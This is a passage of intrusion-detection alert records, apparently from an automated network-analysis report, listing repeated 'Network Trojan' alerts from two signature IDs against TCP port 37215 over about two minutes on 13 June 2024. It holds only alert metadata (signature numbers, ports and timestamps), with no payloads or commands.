              SID:2835222
              Source Port:39994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154950
              SID:2835222
              Source Port:54216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821834
              SID:2829579
              Source Port:34230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095148
              SID:2835222
              Source Port:54432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133945
              SID:2835222
              Source Port:34340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092692
              SID:2829579
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510021
              SID:2835222
              Source Port:39840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573678
              SID:2829579
              Source Port:35120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177479
              SID:2835222
              Source Port:32828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451399
              SID:2835222
              Source Port:35864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043149
              SID:2829579
              Source Port:39310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527938
              SID:2829579
              Source Port:35140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556191
              SID:2829579
              Source Port:40402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151964
              SID:2835222
              Source Port:54486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725586
              SID:2835222
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993673
              SID:2835222
              Source Port:52800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803562
              SID:2835222
              Source Port:52770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937311
              SID:2829579
              Source Port:45540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824741
              SID:2835222
              Source Port:43670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307393
              SID:2829579
              Source Port:39108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215838
              SID:2829579
              Source Port:44150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439401
              SID:2835222
              Source Port:35182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419654
              SID:2835222
              Source Port:40142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436706
              SID:2835222
              Source Port:43464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475314
              SID:2829579
              Source Port:39952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550795
              SID:2835222
              Source Port:43870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752863
              SID:2829579
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027682
              SID:2835222
              Source Port:36546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695492
              SID:2829579
              Source Port:49954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228745
              SID:2829579
              Source Port:43852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197865
              SID:2835222
              Source Port:54294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725804
              SID:2829579
              Source Port:39950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153960
              SID:2829579
              Source Port:52136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174179
              SID:2829579
              Source Port:48926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214290
              SID:2829579
              Source Port:51836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506506
              SID:2829579
              Source Port:43218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459120
              SID:2835222
              Source Port:52768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606499
              SID:2829579
              Source Port:50410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241922
              SID:2829579
              Source Port:34876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403315
              SID:2829579
              Source Port:36454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502617
              SID:2835222
              Source Port:42276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753345
              SID:2829579
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458303
              SID:2835222
              Source Port:35658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.126729
              SID:2835222
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349188
              SID:2829579
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842590
              SID:2835222
              Source Port:41058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910104
              SID:2829579
              Source Port:34656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223687
              SID:2835222
              Source Port:50482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888277
              SID:2835222
              Source Port:58498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674420
              SID:2835222
              Source Port:49558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941449
              SID:2835222
              Source Port:36198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658603
              SID:2835222
              Source Port:49970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169235
              SID:2835222
              Source Port:38044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802117
              SID:2829579
              Source Port:51094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694394
              SID:2835222
              Source Port:60324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886820
              SID:2835222
              Source Port:35716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508263
              SID:2835222
              Source Port:52492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358433
              SID:2835222
              Source Port:42050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611738
              SID:2829579
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345846
              SID:2835222
              Source Port:37656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707972
              SID:2829579
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193560
              SID:2829579
              Source Port:40096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349625
              SID:2835222
              Source Port:34606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195106
              SID:2835222
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884660
              SID:2829579
              Source Port:56120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710889
              SID:2829579
              Source Port:56202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758752
              SID:2835222
              Source Port:54054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660522
              SID:2829579
              Source Port:55594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176220
              SID:2835222
              Source Port:52136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266676
              SID:2829579
              Source Port:40572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453454
              SID:2829579
              Source Port:53636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307392
              SID:2829579
              Source Port:60842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486866
              SID:2829579
              Source Port:54052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908265
              SID:2829579
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087500
              SID:2835222
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241602
              SID:2835222
              Source Port:53440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402997
              SID:2829579
              Source Port:58068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091729
              SID:2835222
              Source Port:53772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509544
              SID:2835222
              Source Port:59906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632933
              SID:2835222
              Source Port:44014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629651
              SID:2829579
              Source Port:35344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870919
              SID:2835222
              Source Port:34480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708673
              SID:2829579
              Source Port:36498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299050
              SID:2829579
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830956
              SID:2829579
              Source Port:34368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480148
              SID:2835222
              Source Port:49294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077435
              SID:2835222
              Source Port:54348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371178
              SID:2835222
              Source Port:49244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174627
              SID:2835222
              Source Port:58710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075279
              SID:2835222
              Source Port:34090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475941
              SID:2835222
              Source Port:58068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488373
              SID:2829579
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245059
              SID:2835222
              Source Port:53362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038109
              SID:2835222
              Source Port:45370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725233
              SID:2835222
              Source Port:52464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503612
              SID:2829579
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055510
              SID:2829579
              Source Port:56238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629584
              SID:2835222
              Source Port:35812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368717
              SID:2829579
              Source Port:50642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089937
              SID:2835222
              Source Port:49930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526290
              SID:2835222
              Source Port:50612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787098
              SID:2829579
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265516
              SID:2829579
              Source Port:43550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438778
              SID:2829579
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339555
              SID:2835222
              Source Port:47768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872289
              SID:2829579
              Source Port:48350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010152
              SID:2835222
              Source Port:35782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416394
              SID:2829579
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229592
              SID:2835222
              Source Port:40134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229883
              SID:2835222
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677478
              SID:2835222
              Source Port:41264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994577
              SID:2829579
              Source Port:52596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169015
              SID:2835222
              Source Port:52934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676952
              SID:2829579
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867553
              SID:2835222
              Source Port:49320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217739
              SID:2835222
              Source Port:41630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129769
              SID:2835222
              Source Port:46644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835181
              SID:2829579
              Source Port:38210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696425
              SID:2835222
              Source Port:55876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724781
              SID:2835222
              Source Port:39706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553212
              SID:2829579
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543023
              SID:2835222
              Source Port:33348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610924
              SID:2835222
              Source Port:40968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942405
              SID:2835222
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975936
              SID:2835222
              Source Port:33896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453420
              SID:2835222
              Source Port:44338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565641
              SID:2829579
              Source Port:59738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307755
              SID:2835222
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199352
              SID:2829579
              Source Port:50246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528016
              SID:2835222
              Source Port:57674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486925
              SID:2835222
              Source Port:35602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729166
              SID:2835222
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222017
              SID:2829579
              Source Port:53282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970762
              SID:2829579
              Source Port:37514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824616
              SID:2835222
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.225039
              SID:2829579
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276749
              SID:2835222
              Source Port:60874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421237
              SID:2829579
              Source Port:46940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754588
              SID:2829579
              Source Port:39338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093924
              SID:2835222
              Source Port:41032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402269
              SID:2829579
              Source Port:53678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502312
              SID:2829579
              Source Port:59990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254806
              SID:2835222
              Source Port:53704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.679188
              SID:2835222
              Source Port:48644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611838
              SID:2829579
              Source Port:53572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041250
              SID:2829579
              Source Port:32914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820824
              SID:2835222
              Source Port:35708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422004
              SID:2829579
              Source Port:33958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040345
              SID:2835222
              Source Port:47882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252742
              SID:2829579
              Source Port:32878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254497
              SID:2829579
              Source Port:51682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617477
              SID:2835222
              Source Port:52010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304513
              SID:2829579
              Source Port:38290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887209
              SID:2835222
              Source Port:38606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909762
              SID:2835222
              Source Port:48374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728920
              SID:2835222
              Source Port:59112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404176
              SID:2829579
              Source Port:39946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631743
              SID:2829579
              Source Port:54098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871739
              SID:2829579
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610282
              SID:2829579
              Source Port:56912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214659
              SID:2829579
              Source Port:56726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607071
              SID:2829579
              Source Port:40304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408738
              SID:2829579
              Source Port:33934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074373
              SID:2829579
              Source Port:49048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091281
              SID:2835222
              Source Port:35034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075812
              SID:2835222
              Source Port:59592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458838
              SID:2835222
              Source Port:46410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345979
              SID:2835222
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128591
              SID:2835222
              Source Port:47440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708072
              SID:2835222
              Source Port:43384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044493
              SID:2835222
              Source Port:46928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192914
              SID:2829579
              Source Port:39536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318291
              SID:2835222
              Source Port:58704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165954
              SID:2829579
              Source Port:38176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611188
              SID:2835222
              Source Port:35638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095227
              SID:2835222
              Source Port:56626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415414
              SID:2835222
              Source Port:58296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198334
              SID:2829579
              Source Port:42358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635010
              SID:2835222
              Source Port:46448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932430
              SID:2835222
              Source Port:36100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346877
              SID:2835222
              Source Port:41364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092754
              SID:2835222
              Source Port:33344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790561
              SID:2835222
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309086
              SID:2829579
              Source Port:47634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996979
              SID:2829579
              Source Port:42844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757116
              SID:2835222
              Source Port:36168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228040
              SID:2835222
              Source Port:44976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165717
              SID:2829579
              Source Port:54370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176426
              SID:2829579
              Source Port:47700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953747
              SID:2835222
              Source Port:34708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655898
              SID:2835222
              Source Port:42596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725865
              SID:2829579
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087457
              SID:2835222
              Source Port:34432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095545
              SID:2829579
              Source Port:45714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546396
              SID:2835222
              Source Port:59188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373188
              SID:2835222
              Source Port:44484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134360
              SID:2835222
              Source Port:44400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128093
              SID:2835222
              Source Port:39476
              Destination Port:37215
